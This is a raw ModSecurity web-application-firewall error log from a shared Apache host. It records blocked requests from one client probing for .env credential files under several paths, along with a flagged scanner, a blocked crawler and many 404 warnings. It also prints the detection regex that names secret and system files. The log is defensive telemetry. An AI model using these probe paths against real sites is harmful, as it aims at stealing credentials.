[Tue May 26 14:49:55.027076 2026] [security2:error] [pid 648203:tid 648407] [client 45.148.10.95:17040] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/app/.env"] [unique_id "ahVlu7EQDDtxJNiDrdTxTQAAAM8"]
[Tue May 26 14:49:55.053305 2026] [security2:error] [pid 648203:tid 648410] [client 45.148.10.95:17066] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlurEQDDtxJNiDrdTxSAAAANI"]
[Tue May 26 14:49:55.064428 2026] [security2:error] [pid 648203:tid 648413] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlu7EQDDtxJNiDrdTxSwAAANU"]
[Tue May 26 14:49:55.085560 2026] [security2:error] [pid 648203:tid 648371] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlu7EQDDtxJNiDrdTxTwAAAKs"]
[Tue May 26 14:49:55.107885 2026] [security2:error] [pid 648203:tid 648404] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlu7EQDDtxJNiDrdTxUgAAAMw"]
[Tue May 26 14:49:55.110291 2026] [security2:error] [pid 648203:tid 648359] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlu7EQDDtxJNiDrdTxVQAAAJ8"]
[Tue May 26 14:49:55.126365 2026] [security2:error] [pid 648203:tid 648421] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlu7EQDDtxJNiDrdTxWAAAAN0"]
[Tue May 26 14:49:55.143208 2026] [security2:error] [pid 648203:tid 648422] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlu7EQDDtxJNiDrdTxWwAAAN4"]
[Tue May 26 14:49:55.154006 2026] [security2:error] [pid 648203:tid 648365] [client 45.148.10.95:17020] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlu7EQDDtxJNiDrdTxXAAAAKU"]
[Tue May 26 14:49:55.301429 2026] [security2:error] [pid 648203:tid 648351] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlu7EQDDtxJNiDrdTxYQAAAJc"]
[Tue May 26 14:49:55.303243 2026] [security2:error] [pid 648203:tid 648451] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlu7EQDDtxJNiDrdTxYgAAAPs"]
[Tue May 26 14:49:55.306491 2026] [security2:error] [pid 648203:tid 648414] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlu7EQDDtxJNiDrdTxZQAAANY"]
[Tue May 26 14:49:55.317512 2026] [security2:error] [pid 648203:tid 648445] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlu7EQDDtxJNiDrdTxaAAAAPU"]
[Tue May 26 14:49:55.324079 2026] [security2:error] [pid 648203:tid 648387] [client 45.148.10.95:17142] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlu7EQDDtxJNiDrdTxaQAAALs"]
[Tue May 26 14:49:55.329869 2026] [security2:error] [pid 648203:tid 648443] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlu7EQDDtxJNiDrdTxbgAAAPM"]
[Tue May 26 14:49:55.344709 2026] [security2:error] [pid 648203:tid 648388] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlu7EQDDtxJNiDrdTxbwAAALw"]
[Tue May 26 14:49:55.345453 2026] [security2:error] [pid 648203:tid 648441] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlu7EQDDtxJNiDrdTxcgAAAPE"]
[Tue May 26 14:49:55.374874 2026] [security2:error] [pid 648203:tid 648357] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlu7EQDDtxJNiDrdTxdQAAAJ0"]
[Tue May 26 14:49:55.408793 2026] [security2:error] [pid 648203:tid 648402] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlurEQDDtxJNiDrdTxRwAAAMo"]
[Tue May 26 14:49:55.440091 2026] [security2:error] [pid 648203:tid 648398] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlu7EQDDtxJNiDrdTxeAAAAMY"]
[Tue May 26 14:49:55.449916 2026] [security2:error] [pid 648203:tid 648444] [client 45.148.10.95:17008] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/application/.env"] [unique_id "ahVlu7EQDDtxJNiDrdTxfgAAAPQ"]
[Tue May 26 14:49:55.539057 2026] [security2:error] [pid 648203:tid 648447] [client 45.148.10.95:17094] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlu7EQDDtxJNiDrdTxgAAAAPc"]
[Tue May 26 14:49:55.547188 2026] [security2:error] [pid 648203:tid 648399] [client 45.148.10.95:17112] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlu7EQDDtxJNiDrdTxggAAAMc"]
[Tue May 26 14:49:55.551792 2026] [security2:error] [pid 648203:tid 648385] [client 45.148.10.95:17036] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlu7EQDDtxJNiDrdTxhQAAALk"]
[Tue May 26 14:49:55.554076 2026] [security2:error] [pid 648203:tid 648345] [client 85.208.96.206:35468] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/top-deejay-headphones/"] [unique_id "ahVlu7EQDDtxJNiDrdTxhwAAAJE"]
[Tue May 26 14:49:55.554243 2026] [security2:error] [pid 648203:tid 648345] [client 85.208.96.206:35468] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.anujtradingco.com"] [uri "/top-deejay-headphones/"] [unique_id "ahVlu7EQDDtxJNiDrdTxhwAAAJE"]
[Tue May 26 14:49:55.606798 2026] [security2:error] [pid 648203:tid 648407] [client 45.148.10.95:17020] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlu7EQDDtxJNiDrdTxhgAAAM8"]
[Tue May 26 14:49:55.619276 2026] [security2:error] [pid 648203:tid 648453] [client 45.148.10.95:17154] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlu7EQDDtxJNiDrdTxiAAAAP0"]
[Tue May 26 14:49:55.655102 2026] [security2:error] [pid 648203:tid 648261] [remote 74.7.241.58:40686] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVlu7EQDDtxJNiDrdTxkwAAsDk"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/vi
[Tue May 26 14:49:55.658654 2026] [security2:error] [pid 648203:tid 648383] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlu7EQDDtxJNiDrdTxjwAAALc"]
[Tue May 26 14:49:55.659251 2026] [security2:error] [pid 648203:tid 648381] [client 45.148.10.95:17070] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlu7EQDDtxJNiDrdTxjQAAALU"]
[Tue May 26 14:49:55.725497 2026] [security2:error] [pid 648203:tid 648404] [client 45.148.10.95:17066] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlu7EQDDtxJNiDrdTxlAAAAMw"]
[Tue May 26 14:49:55.737256 2026] [security2:error] [pid 648203:tid 648359] [client 45.148.10.95:16970] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlu7EQDDtxJNiDrdTxlQAAAJ8"]
[Tue May 26 14:49:55.744828 2026] [security2:error] [pid 648203:tid 648415] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlu7EQDDtxJNiDrdTxmwAAANc"]
[Tue May 26 14:49:55.790564 2026] [security2:error] [pid 648203:tid 648431] [client 45.148.10.95:17112] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlu7EQDDtxJNiDrdTxnAAAAOc"]
[Tue May 26 14:49:55.832901 2026] [security2:error] [pid 648203:tid 648335] [client 45.148.10.95:17154] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlu7EQDDtxJNiDrdTxnQAAAIc"]
[Tue May 26 14:49:55.833495 2026] [security2:error] [pid 648203:tid 648433] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlu7EQDDtxJNiDrdTxoAAAAOk"]
[Tue May 26 14:49:55.848137 2026] [security2:error] [pid 648203:tid 648367] [client 45.148.10.95:16988] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/apps/.env"] [unique_id "ahVlu7EQDDtxJNiDrdTxpAAAAKc"]
[Tue May 26 14:49:55.904447 2026] [security2:error] [pid 648203:tid 648417] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlu7EQDDtxJNiDrdTxowAAANk"]
[Tue May 26 14:49:55.933109 2026] [security2:error] [pid 648203:tid 648372] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlu7EQDDtxJNiDrdTxpwAAAKw"]
[Tue May 26 14:49:55.938139 2026] [security2:error] [pid 648203:tid 648366] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlu7EQDDtxJNiDrdTxqgAAAKY"]
[Tue May 26 14:49:55.952040 2026] [security2:error] [pid 648203:tid 648400] [client 45.148.10.95:17002] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlu7EQDDtxJNiDrdTxrAAAAMg"]
[Tue May 26 14:49:55.955178 2026] [security2:error] [pid 648203:tid 648380] [client 45.148.10.95:17094] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlu7EQDDtxJNiDrdTxrwAAALQ"]
[Tue May 26 14:49:55.958353 2026] [security2:error] [pid 648203:tid 648352] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlu7EQDDtxJNiDrdTxrgAAAJg"]
[Tue May 26 14:49:55.973439 2026] [security2:error] [pid 648203:tid 648451] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlu7EQDDtxJNiDrdTxsgAAAPs"]
[Tue May 26 14:49:56.007752 2026] [security2:error] [pid 648203:tid 648443] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlu7EQDDtxJNiDrdTxuAAAAPM"]
[Tue May 26 14:49:56.071351 2026] [security2:error] [pid 648203:tid 648443] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlvLEQDDtxJNiDrdTxyQAAAPM"]
[Tue May 26 14:49:56.079087 2026] [security2:error] [pid 648203:tid 648405] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlvLEQDDtxJNiDrdTxyAAAAM0"]
[Tue May 26 14:49:56.085391 2026] [security2:error] [pid 648203:tid 648398] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlvLEQDDtxJNiDrdTxzAAAAMY"]
[Tue May 26 14:49:56.423847 2026] [security2:error] [pid 648203:tid 648424] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlvLEQDDtxJNiDrdTx0wAAAOA"]
[Tue May 26 14:49:56.757280 2026] [security2:error] [pid 648203:tid 648396] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlvLEQDDtxJNiDrdTx5AAAAMQ"]
[Tue May 26 14:49:57.009382 2026] [security2:error] [pid 648203:tid 648354] [client 45.148.10.95:17040] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlvLEQDDtxJNiDrdTx6wAAAJo"]
[Tue May 26 14:49:57.017386 2026] [security2:error] [pid 648203:tid 648440] [client 45.148.10.95:17050] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlvLEQDDtxJNiDrdTx7gAAAPA"]
[Tue May 26 14:49:57.142600 2026] [security2:error] [pid 648203:tid 648449] [client 104.207.60.34:17967] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlu7EQDDtxJNiDrdTxvwAAAPk"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:49:57.720107 2026] [security2:error] [pid 648203:tid 648403] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlvbEQDDtxJNiDrdTx-wAAAMs"]
[Tue May 26 14:49:57.817821 2026] [security2:error] [pid 648203:tid 648356] [client 45.148.10.95:16988] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/back/.env"] [unique_id "ahVlvbEQDDtxJNiDrdTyBQAAAJw"]
[Tue May 26 14:49:57.900663 2026] [security2:error] [pid 648203:tid 648342] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlvbEQDDtxJNiDrdTyCAAAAI4"]
[Tue May 26 14:49:58.049635 2026] [security2:error] [pid 648203:tid 648423] [client 45.148.10.95:17154] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/backend-api/.env"] [unique_id "ahVlvrEQDDtxJNiDrdTyEQAAAN8"]
[Tue May 26 14:49:58.147742 2026] [security2:error] [pid 648203:tid 648362] [client 46.203.157.253:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVlvrEQDDtxJNiDrdTyFAAAAKI"], referer: https://www.anujtradingco.com/
[Tue May 26 14:49:58.196995 2026] [security2:error] [pid 648203:tid 648375] [client 45.148.10.95:17154] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/backend/.env"] [unique_id "ahVlvrEQDDtxJNiDrdTyHAAAAK8"]
[Tue May 26 14:49:58.420864 2026] [security2:error] [pid 648203:tid 648391] [client 45.148.10.95:17018] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlvrEQDDtxJNiDrdTyHwAAAL8"]
[Tue May 26 14:49:58.440773 2026] [security2:error] [pid 648203:tid 648436] [client 45.148.10.95:16970] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlvrEQDDtxJNiDrdTyIAAAAOw"]
[Tue May 26 14:49:58.472580 2026] [security2:error] [pid 648203:tid 648438] [client 45.148.10.95:17094] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlvrEQDDtxJNiDrdTyIQAAAO4"]
[Tue May 26 14:49:58.522524 2026] [security2:error] [pid 648203:tid 648371] [client 45.148.10.95:17070] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlvrEQDDtxJNiDrdTyIgAAAKs"]
